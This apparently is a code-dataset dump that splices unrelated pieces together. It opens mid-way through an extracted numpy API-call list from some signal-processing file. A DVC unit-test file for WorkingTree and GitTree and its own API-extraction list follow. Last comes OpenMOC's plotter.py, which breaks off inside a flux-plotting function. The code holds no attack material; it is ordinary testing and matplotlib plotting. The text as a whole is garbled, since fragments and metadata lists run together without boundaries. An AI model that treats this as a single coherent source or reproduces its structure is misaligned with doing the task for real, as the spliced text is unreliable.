((31217, 31237), 'numpy.zeros', 'np.zeros', (['(n_shift,)'], {}), '((n_shift,))\n', (31225, 31237), True, 'import numpy as np\n'), ((33290, 33318), 'numpy.kaiser', 'np.kaiser', (['size', 'kaiser_beta'], {}), '(size, kaiser_beta)\n', (33299, 33318), True, 'import numpy as np\n'), ((40450, 40484), 'numpy.floor', 'np.floor', (['(start * self.sample_rate)'], {}), '(start * self.sample_rate)\n', (40458, 40484), True, 'import numpy as np\n'), ((40555, 40586), 'numpy.ceil', 'np.ceil', (['(end * self.sample_rate)'], {}), '(end * self.sample_rate)\n', (40562, 40586), True, 'import numpy as np\n')]
|
# encoding: utf-8
from __future__ import unicode_literals
from os.path import join
from dvc.scm import SCM
from dvc.scm.git import GitTree
from dvc.scm.tree import WorkingTree
from tests.basic_env import TestDir, TestGit
class TestWorkingTree(TestDir):
def setUp(self):
super(TestWorkingTree, self).setUp()
self.tree = WorkingTree()
def test_open(self):
self.assertEqual(self.tree.open(self.FOO).read(), self.FOO_CONTENTS)
self.assertEqual(
self.tree.open(self.UNICODE).read(), self.UNICODE_CONTENTS
)
def test_exists(self):
self.assertTrue(self.tree.exists(self.FOO))
self.assertTrue(self.tree.exists(self.UNICODE))
self.assertFalse(self.tree.exists("not-existing-file"))
def test_isdir(self):
self.assertTrue(self.tree.isdir(self.DATA_DIR))
self.assertFalse(self.tree.isdir(self.FOO))
self.assertFalse(self.tree.isdir("not-existing-file"))
def test_isfile(self):
self.assertTrue(self.tree.isfile(self.FOO))
self.assertFalse(self.tree.isfile(self.DATA_DIR))
self.assertFalse(self.tree.isfile("not-existing-file"))
class TestGitTree(TestGit):
def setUp(self):
super(TestGitTree, self).setUp()
self.scm = SCM(self._root_dir)
self.tree = GitTree(self.git, "master")
def test_open(self):
self.scm.add([self.FOO, self.UNICODE, self.DATA_DIR])
self.scm.commit("add")
self.assertEqual(self.tree.open(self.FOO).read(), self.FOO_CONTENTS)
self.assertEqual(
self.tree.open(self.UNICODE).read(), self.UNICODE_CONTENTS
)
with self.assertRaises(IOError):
self.tree.open("not-existing-file")
with self.assertRaises(IOError):
self.tree.open(self.DATA_DIR)
def test_exists(self):
self.assertFalse(self.tree.exists(self.FOO))
self.assertFalse(self.tree.exists(self.UNICODE))
self.assertFalse(self.tree.exists(self.DATA_DIR))
self.scm.add([self.FOO, self.UNICODE, self.DATA])
self.scm.commit("add")
self.assertTrue(self.tree.exists(self.FOO))
self.assertTrue(self.tree.exists(self.UNICODE))
self.assertTrue(self.tree.exists(self.DATA_DIR))
self.assertFalse(self.tree.exists("non-existing-file"))
def test_isdir(self):
self.scm.add([self.FOO, self.DATA_DIR])
self.scm.commit("add")
self.assertTrue(self.tree.isdir(self.DATA_DIR))
self.assertFalse(self.tree.isdir(self.FOO))
self.assertFalse(self.tree.isdir("non-existing-file"))
def test_isfile(self):
self.scm.add([self.FOO, self.DATA_DIR])
self.scm.commit("add")
self.assertTrue(self.tree.isfile(self.FOO))
self.assertFalse(self.tree.isfile(self.DATA_DIR))
self.assertFalse(self.tree.isfile("not-existing-file"))
class AssertWalkEqualMixin(object):
def assertWalkEqual(self, actual, expected, msg=None):
def convert_to_sets(walk_results):
return [
(root, set(dirs), set(nondirs))
for root, dirs, nondirs in walk_results
]
self.assertEqual(
convert_to_sets(actual), convert_to_sets(expected), msg=msg
)
class TestWalkInNoSCM(AssertWalkEqualMixin, TestDir):
def test(self):
tree = WorkingTree()
self.assertWalkEqual(
tree.walk("."),
[
(".", ["data_dir"], ["code.py", "bar", "тест", "foo"]),
(join("data_dir"), ["data_sub_dir"], ["data"]),
(join("data_dir", "data_sub_dir"), [], ["data_sub"]),
],
)
def test_subdir(self):
tree = WorkingTree()
self.assertWalkEqual(
tree.walk(join("data_dir", "data_sub_dir")),
[(join("data_dir", "data_sub_dir"), [], ["data_sub"])],
)
class TestWalkInGit(AssertWalkEqualMixin, TestGit):
def test_nobranch(self):
tree = WorkingTree()
self.assertWalkEqual(
tree.walk("."),
[
(".", ["data_dir"], ["bar", "тест", "code.py", "foo"]),
("data_dir", ["data_sub_dir"], ["data"]),
(join("data_dir", "data_sub_dir"), [], ["data_sub"]),
],
)
self.assertWalkEqual(
tree.walk(join("data_dir", "data_sub_dir")),
[(join("data_dir", "data_sub_dir"), [], ["data_sub"])],
)
def test_branch(self):
scm = SCM(self._root_dir)
scm.add([self.DATA_SUB_DIR])
scm.commit("add data_dir/data_sub_dir/data_sub")
tree = GitTree(self.git, "master")
self.assertWalkEqual(
tree.walk("."),
[
(".", ["data_dir"], ["code.py"]),
("data_dir", ["data_sub_dir"], []),
(join("data_dir", "data_sub_dir"), [], ["data_sub"]),
],
)
self.assertWalkEqual(
tree.walk(join("data_dir", "data_sub_dir")),
[(join("data_dir", "data_sub_dir"), [], ["data_sub"])],
)
|
[
"dvc.scm.git.GitTree",
"os.path.join",
"dvc.scm.tree.WorkingTree",
"dvc.scm.SCM"
] |
[((345, 358), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (356, 358), False, 'from dvc.scm.tree import WorkingTree\n'), ((1280, 1299), 'dvc.scm.SCM', 'SCM', (['self._root_dir'], {}), '(self._root_dir)\n', (1283, 1299), False, 'from dvc.scm import SCM\n'), ((1320, 1347), 'dvc.scm.git.GitTree', 'GitTree', (['self.git', '"""master"""'], {}), "(self.git, 'master')\n", (1327, 1347), False, 'from dvc.scm.git import GitTree\n'), ((3374, 3387), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (3385, 3387), False, 'from dvc.scm.tree import WorkingTree\n'), ((3734, 3747), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (3745, 3747), False, 'from dvc.scm.tree import WorkingTree\n'), ((4011, 4024), 'dvc.scm.tree.WorkingTree', 'WorkingTree', ([], {}), '()\n', (4022, 4024), False, 'from dvc.scm.tree import WorkingTree\n'), ((4529, 4548), 'dvc.scm.SCM', 'SCM', (['self._root_dir'], {}), '(self._root_dir)\n', (4532, 4548), False, 'from dvc.scm import SCM\n'), ((4658, 4685), 'dvc.scm.git.GitTree', 'GitTree', (['self.git', '"""master"""'], {}), "(self.git, 'master')\n", (4665, 4685), False, 'from dvc.scm.git import GitTree\n'), ((3800, 3832), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (3804, 3832), False, 'from os.path import join\n'), ((4374, 4406), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4378, 4406), False, 'from os.path import join\n'), ((5007, 5039), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (5011, 5039), False, 'from os.path import join\n'), ((3549, 3565), 'os.path.join', 'join', (['"""data_dir"""'], {}), "('data_dir')\n", (3553, 3565), False, 'from os.path import join\n'), ((3613, 3645), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (3617, 3645), False, 'from os.path import join\n'), ((3849, 3881), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (3853, 3881), False, 'from os.path import join\n'), ((4244, 4276), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4248, 4276), False, 'from os.path import join\n'), ((4423, 4455), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4427, 4455), False, 'from os.path import join\n'), ((4877, 4909), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (4881, 4909), False, 'from os.path import join\n'), ((5056, 5088), 'os.path.join', 'join', (['"""data_dir"""', '"""data_sub_dir"""'], {}), "('data_dir', 'data_sub_dir')\n", (5060, 5088), False, 'from os.path import join\n')]
|
#
# @file plotter.py
# @package openmoc.plotter
# @brief The plotter module provides utility functions to plot data from
# OpenMOCs C++ classes, in particular, the geomery, including Material,
# Cells and flat source regions, and fluxes and pin powers.
# @author <NAME> (<EMAIL>)
# @date March 10, 2013
import os
import sys
import numpy as np
import numpy.random
import matplotlib
# force headless backend, or set 'backend' to 'Agg'
# in your ~/.matplotlib/matplotlibrc
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.cm as cmx
import openmoc
# For Python 2.X.X
if (sys.version_info[0] == 2):
from log import *
from process import *
# For Python 3.X.X
else:
from openmoc.log import *
from openmoc.process import *
# Force non-interactive mode, or set 'interactive' to False
# in your ~/.matplotlib/matplotlibrc
plt.ioff()
## A static variable for the output directory in which to save plots
subdirectory = "/plots/"
TINY_MOVE = openmoc.TINY_MOVE
##
# @brief Plots the characteristic tracks from an OpenMOC simulation.
# @details This method requires that Tracks have been generated by a
# TrackGenerator object. A user may invoke this function from
# an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_tracks(track_generator)
# @endcode
#
# @param track_generator the TrackGenerator which has generated Tracks
def plot_tracks(track_generator):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'TrackGenerator' in str(type(track_generator)):
py_printf('ERROR', 'Unable to plot Tracks since %s was input rather ' + \
'than a TrackGenerator', str(type(track_generator)))
if not track_generator.containsTracks():
py_printf('ERROR', 'Unable to plot Tracks since the track ' + \
'generator has not yet generated tracks')
py_printf('NORMAL', 'Plotting the tracks...')
# Retrieve data from TrackGenerator
vals_per_track = openmoc.NUM_VALUES_PER_RETRIEVED_TRACK
num_azim = track_generator.getNumAzim()
spacing = track_generator.getTrackSpacing()
num_tracks = track_generator.getNumTracks()
coords = track_generator.retrieveTrackCoords(num_tracks*vals_per_track)
# Convert data to NumPy arrays
coords = np.array(coords)
x = coords[0::vals_per_track/2]
y = coords[1::vals_per_track/2]
# Make figure of line segments for each Track
fig = plt.figure()
for i in range(num_tracks):
plt.plot([x[i*2], x[i*2+1]], [y[i*2], y[i*2+1]], 'b-')
plt.xlim([x.min(), x.max()])
plt.ylim([y.min(), y.max()])
title = 'Tracks for ' + str(num_azim) + ' angles and ' + str(spacing) + \
' cm spacing'
plt.title(title)
filename = directory + 'tracks-' + str(num_azim) + '-angles-' + \
str(spacing) + '-spacing.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief Plots the characteristic Track segments from an OpenMOC simulation.
# @details This method requires that tracks have been generated by a
# TrackGenerator object. Each segment is colored by the ID of the
# unique flat flat source region it is within. A user may invoke
# this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_segments(track_generator)
# @endcode
#
# @param track_generator the TrackGenerator which has generated Tracks
def plot_segments(track_generator):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'TrackGenerator' in str(type(track_generator)):
py_printf('ERROR', 'Unable to plot Track segments since %s was input ' + \
'rather than a TrackGenerator', str(type(track_generator)))
if not track_generator.containsTracks():
py_printf('ERROR', 'Unable to plot Track segments since the ' + \
'TrackGenerator has not yet generated Tracks.')
py_printf('NORMAL', 'Plotting the track segments...')
# Retrieve data from TrackGenerator
vals_per_segment = openmoc.NUM_VALUES_PER_RETRIEVED_SEGMENT
num_azim = track_generator.getNumAzim()
spacing = track_generator.getTrackSpacing()
num_segments = track_generator.getNumSegments()
num_fsrs = track_generator.getGeometry().getNumFSRs()
coords = track_generator.retrieveSegmentCoords(num_segments*vals_per_segment)
# Convert data to NumPy arrays
coords = np.array(coords)
x = numpy.zeros(num_segments*2)
y = numpy.zeros(num_segments*2)
z = numpy.zeros(num_segments*2)
fsrs = numpy.zeros(num_segments)
for i in range(num_segments):
fsrs[i] = coords[i*vals_per_segment]
x[i*2] = coords[i*vals_per_segment+1]
y[i*2] = coords[i*vals_per_segment+2]
z[i*2] = coords[i*vals_per_segment+3]
x[i*2+1] = coords[i*vals_per_segment+4]
y[i*2+1] = coords[i*vals_per_segment+5]
z[i*2+1] = coords[i*vals_per_segment+6]
# Create array of equally spaced randomized floats as a color map for plots
# Seed the NumPy random number generator to ensure reproducible color maps
numpy.random.seed(1)
color_map = np.linspace(0., 1., num_fsrs, endpoint=False)
numpy.random.shuffle(color_map)
# Make figure of line segments for each track
fig = plt.figure()
for i in range(num_segments):
# Create a color map corresponding to FSR IDs
jet = cm = plt.get_cmap('jet')
cNorm = colors.Normalize(vmin=0, vmax=max(color_map))
scalarMap = cmx.ScalarMappable(norm=cNorm)
color = scalarMap.to_rgba(color_map[fsrs[i] % num_fsrs])
plt.plot([x[i*2], x[i*2+1]], [y[i*2], y[i*2+1]], c=color)
plt.xlim([x.min(), x.max()])
plt.ylim([y.min(), y.max()])
suptitle = 'Segments for ' + str(num_azim) + ' angles, and ' + str(spacing) + \
' cm spacing'
title = 'z = ' + str(z[0])
plt.suptitle(suptitle)
plt.title(title)
filename = directory + 'segments-' + str(num_azim) + '-angles-' + \
str(spacing) + '-spacing-z-' + str(z[0]) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry object and plots a color-coded 2D
# surface plot representing the Materials in the Geometry.
# @details The Geometry object must be initialized with Materials, Cells,
# Universes and lattices before being passed into this method. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_materials(geometry)
# @endcode
#
# @param geometry a geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
# @param zcoord optional the z coordinate (default is 0.0)
def plot_materials(geometry, gridsize=250, xlim=None, ylim=None, zcoord=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the Materials since ' + \
'input was not a geometry class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the Materials since ' + \
'the gridsize %d is not an integer', gridsize)
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the Materials ' + \
'with a negative gridsize (%d)', gridsize)
# If zcoord was not set, set the zcoord to 0.0
if zcoord is None:
zcoord = 0.0
# Check z-coord
check_zcoord(geometry, zcoord)
py_printf('NORMAL', 'Plotting the materials...')
# Initialize a NumPy array for the surface colors
surface = numpy.zeros((gridsize, gridsize), numpy.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Find the <aterial IDs for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
cell = geometry.findCellContainingCoords(point)
# If we did not find a Cell for this region, use a -1 "bad" number color
if cell is None:
surface[j][i] = -1
else:
surface[j][i] = cell.getFillMaterial().getId()
# Get the number of Materials in the Geometry
materials = geometry.getAllMaterials()
num_materials = len(materials)
# Create array of all Material IDs and randomly (but reproducibly) permute it
material_ids = [material_id for material_id in materials]
numpy.random.seed(1)
numpy.random.shuffle(material_ids)
# Create an array of the colors (array indices) for each value in the surface
colors = np.zeros((gridsize, gridsize))
for material_id in np.unique(surface):
index = material_ids.index(material_id)
indices = np.where(surface == material_id)
colors[indices] = index
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the Materials
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap, vmin=0, vmax=num_materials)
plt.suptitle('Materials')
plt.title('z = ' + str(zcoord))
filename = directory + 'materials-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry object and plots a color-coded 2D
# surface plot representing the Cells in the Geometry.
# @details The geometry object must be initialized with Materials, Cells,
# Universes and Lattices before being passed into this method. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_cells(geometry)
# @endcode
#
# @param geometry a Geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
# @param zcoord optional the z coordinate (default is 0.0)
def plot_cells(geometry, gridsize=250, xlim=None, ylim=None, zcoord=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the Cells since ' + \
'input was not a Geometry class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the Cells since ' + \
'the gridsize %d is not an integer', gridsize)
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the Cells ' + \
'with a negative gridsize (%d)', gridsize)
if zcoord is None:
zcoord = 0.0
# Check z-coord
check_zcoord(geometry, zcoord)
py_printf('NORMAL', 'Plotting the cells...')
# Initialize a NumPy array for the surface colors
surface = np.zeros((gridsize, gridsize), numpy.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Find the Cell IDs for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
cell = geometry.findCellContainingCoords(point)
# If we did not find a Cell for this region, use a -1 "bad" number color
if cell is None:
surface[j][i] = -1
else:
surface[j][i] = cell.getId()
# Get the number of Material Cells in the Geometry
material_cells = geometry.getAllMaterialCells()
num_cells = len(material_cells)
# Create array of all Cell IDs and randomly (but reproducibly) permute it
cell_ids = [cell_id for cell_id in material_cells]
numpy.random.seed(1)
numpy.random.shuffle(cell_ids)
# Create an array of the colors (array indices) for each value in the surface
colors = np.zeros((gridsize, gridsize))
for cell_id in np.unique(surface):
index = cell_ids.index(cell_id)
indices = np.where(surface == cell_id)
colors[indices] = index
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the Cells
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap, vmin=0, vmax=num_cells)
plt.suptitle('Cells')
plt.title('z = ' + str(zcoord))
filename = directory + 'cells-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry object and plots a color-coded 2D
# surface plot representing the flat source regions in the Geometry.
# The FSR centroids are plotted as black circles on top of the FSRs if
# the centroids boolean is set to True.
# @details The Geometry object must be initialized with Materials, Cells,
# Universes and Lattices before being passed into this method. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_flat_source_regions(geometry)
# @endcode
#
# @param geometry a geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
# @param centroids optional boolean to plot the FSR centroids
# @param marker_type optional string to set the centroids marker type
# @param marker_size optional int/float to set the centroids marker size
def plot_flat_source_regions(geometry, gridsize=250, xlim=None, ylim=None, \
centroids=False, marker_type='o', marker_size=2):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'input was not a geometry class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'the gridsize %d is not an integer', gridsize)
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the flat source regions ' + \
'with a negative gridsize (%d)', gridsize)
if not isinstance(centroids, bool):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'centroids is not a boolean')
if not isinstance(marker_type, str):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'marker_type is a string')
if marker_type not in matplotlib.markers.MarkerStyle().markers.keys():
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'marker_type is not a valid marker (%d)', marker_type)
if not is_float(marker_size) and not is_integer(marker_size):
py_printf('ERROR', 'Unable to plot the flat source regions since ' + \
'marker_size is not an int or float', marker_size)
if marker_size <= 0:
py_printf('ERROR', 'Unable to plot the flat source regions ' + \
'with a negative marker_size (%d)', marker_size)
py_printf('NORMAL', 'Plotting the flat source regions...')
# Get the number of flat source regions
num_fsrs = geometry.getNumFSRs()
if num_fsrs == 0:
py_printf('ERROR', 'Unable to plot the flat source regions ' + \
'since no tracks have been generated.')
# Initialize a NumPy array for the surface colors
surface = numpy.zeros((gridsize, gridsize), dtype=np.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
# Find the flat source region IDs for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
local_coords = openmoc.LocalCoords(x, y, zcoord)
local_coords.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(local_coords)
fsr_id = geometry.getFSRId(local_coords)
# If we did not find a region for this region, use a -1 "bad" number color
if fsr_id is None:
surface[j][i] = -1
else:
surface[j][i] = fsr_id
del local_coords
# Replace each Cell ID with a random (but reproducible) color ID
# NOTE: This color coding scheme only works for FSRs and CMFD cells and not
# for Materials and Cells. The reason is that FSRs and CMFD cells are by
# definition a sequence of consecutive, monotonically increasing integers.
# Material and Cell IDs however may be any sequence of positive integers.
all_ids = np.arange(num_fsrs, dtype=np.int64)
id_colors = np.arange(num_fsrs, dtype=np.int64)
numpy.random.seed(1)
np.random.shuffle(id_colors)
ids_to_colors = np.arange(num_fsrs, dtype=np.int64)
ids_to_colors[all_ids] = id_colors
colors = ids_to_colors.take(surface)
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the flat source regions
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap, vmin=0, vmax=num_fsrs)
# Plot centroids on top of 2D FSR color map
if centroids:
centroids_x = []
centroids_y = []
for r in range(geometry.getNumFSRs()):
point = geometry.getFSRCentroid(r)
centroids_x.append(point.getX())
centroids_y.append(point.getY())
plt.scatter(centroids_x, centroids_y, color='k', marker=marker_type, \
s=marker_size)
# Matplotlib likes to add a buffer around scatter plots, so we will
# manually set the plot bounds
plt.xlim(min(coords['x']), max(coords['x']))
plt.ylim(min(coords['y']), max(coords['y']))
# Set the plot title and save the figure
plt.suptitle('Flat Source Regions')
plt.title('z = ' + str(zcoord))
filename = directory + 'flat-source-regions-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Geometry and Cmfd object and plots a
# color-coded 2D surface plot representing the CMFD cells in a geometry.
# @details The Geometry object must be initialized with Materials, Cells,
# Universes and Lattices before being passed into this method.
# Plotting the CMFD cells requires that segments must have been
# created for the geometry and FSR IDs assigned to regions. A user
# may invoke this function from an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_cmfd_cells(geometry, cmfd)
# @endcode
#
# @param geometry a geometry object which has been initialized with Materials,
# Cells, Universes and Lattices. Segments must have been created or
# extracted from a file.
# @param cmfd a Cmfd object which has been used with the geometry in
# generating segments. The Cmfd object must have the _overlay_mesh
# flag set to true; otherwise, the map linking FSR IDs to CMFD cells
# would not have been created.
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
def plot_cmfd_cells(geometry, cmfd, gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
# Error checking
if not 'Geometry' in str(type(geometry)):
py_printf('ERROR', 'Unable to plot the CMFD cells since ' + \
'input was not a geometry class object')
if not 'Cmfd' in str(type(cmfd)):
py_printf('ERROR', 'Unable to plot the CMFD cells since ' + \
'input was not a CMFD class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the CMFD cells since ' + \
'the gridsize %s is not an integer', str(gridsize))
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the CMFD cells ' + \
'with a negative gridsize (%d)', gridsize)
py_printf('NORMAL', 'Plotting the CMFD cells...')
# Initialize a NumPy array for the surface colors
surface = numpy.zeros((gridsize, gridsize), numpy.int64)
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
# Find the CMFD cell ID for each grid point
for i in range(gridsize):
for j in range(gridsize):
x = coords['x'][i]
y = coords['y'][j]
local_coords = openmoc.LocalCoords(x, y, zcoord)
local_coords.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(local_coords)
fsr_id = geometry.getFSRId(local_coords)
cell_id = cmfd.convertFSRIdToCmfdCell(fsr_id)
# If we did not find a cell for this point, use a -1 "bad" number color
if np.isnan(cell_id):
surface[j][i] = -1
else:
surface[j][i] = cell_id
# Get the number of CMFD cells
num_cmfd_cells = cmfd.getNumCells()
# Replace each Cell ID with a random (but reproducible) color ID
# NOTE: This color coding scheme only works for FSRs and CMFD cells and not
# for Materials and Cells. The reason is that FSRs and CMFD cells are by
# definition a sequence of consecutive, monotonically increasing integers.
# Material and Cell IDs however may be any sequence of positive integers.
all_ids = np.arange(num_cmfd_cells, dtype=np.int64)
id_colors = np.arange(num_cmfd_cells, dtype=np.int64)
numpy.random.seed(1)
np.random.shuffle(id_colors)
ids_to_colors = np.arange(num_cmfd_cells, dtype=np.int64)
ids_to_colors[all_ids] = id_colors
colors = ids_to_colors.take(surface)
# Make Matplotlib color "bad" numbers (ie, NaN, INF) with transparent pixels
cmap = plt.get_cmap('spectral')
cmap.set_bad(alpha=0.0)
# Plot a 2D color map of the CMFD cells
fig = plt.figure()
colors = np.flipud(colors)
plt.imshow(colors, extent=coords['bounds'],
interpolation='nearest', cmap=cmap)
plt.title('CMFD cells')
filename = directory + 'cmfd-cells.png'
fig.savefig(filename, bbox_inches='tight')
##
# @brief This method takes in a Solver object and plots a color-coded 2D
# surface plot representing the flat source region scalar fluxes.
# @details The Solver must have converged the flat source sources prior to
# calling this routine. A user may invoke this function from an
# OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_spatial_fluxes(solver, energy_groups=[1,7])
# @endcode
#
# @param solver a Solver object that has converged the source for the Geometry
# @param energy_groups a Python list of integer energy groups to plot
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
def plot_spatial_fluxes(solver, energy_groups=[1],
gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'Solver' in str(type(solver)):
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'input did not contain a solver class object')
geometry = solver.getGeometry()
num_groups = geometry.getNumEnergyGroups()
if isinstance(energy_groups, (list, tuple, np.ndarray)):
for group in energy_groups:
if not is_integer(group):
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups contains %s which is not a number', str(group))
elif group <= 0:
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups contains %d which is less than the ' + \
'index for all energy groups', group)
elif group > num_groups:
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups contains %d which is greater than ' + \
'the index for all energy groups', group)
else:
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'energy_groups is not a Python tuple/list or NumPy array')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the FSR flux since the ' + \
'gridsize %s is not an integer', str(gridsize))
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the FSR flux with a ' + \
'negative gridsize (%d)', gridsize)
py_printf('NORMAL', 'Plotting the FSR scalar fluxes...')
# Initialize a numpy array for the groupwise scalar fluxes
fluxes = numpy.zeros((len(energy_groups), gridsize, gridsize))
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
for i in range(gridsize):
for j in range(gridsize):
# Find the flat source region IDs for each grid point
x = coords['x'][i]
y = coords['y'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(point)
fsr_id = geometry.getFSRId(point)
# If we did not find a region for this region, use a -1 "bad" number color
if np.isnan(fsr_id):
fluxes[:,j,i] = -1
# Get the scalar flux for each energy group in this FSR
else:
for index, group in enumerate(energy_groups):
fluxes[index,j,i] = solver.getFlux(fsr_id, group)
# Loop over all energy group and create a plot
for index, group in enumerate(energy_groups):
# Plot a 2D color map of the flat source regions
fig = plt.figure()
plt.imshow(np.flipud(fluxes[index,:,:]), extent=coords['bounds'])
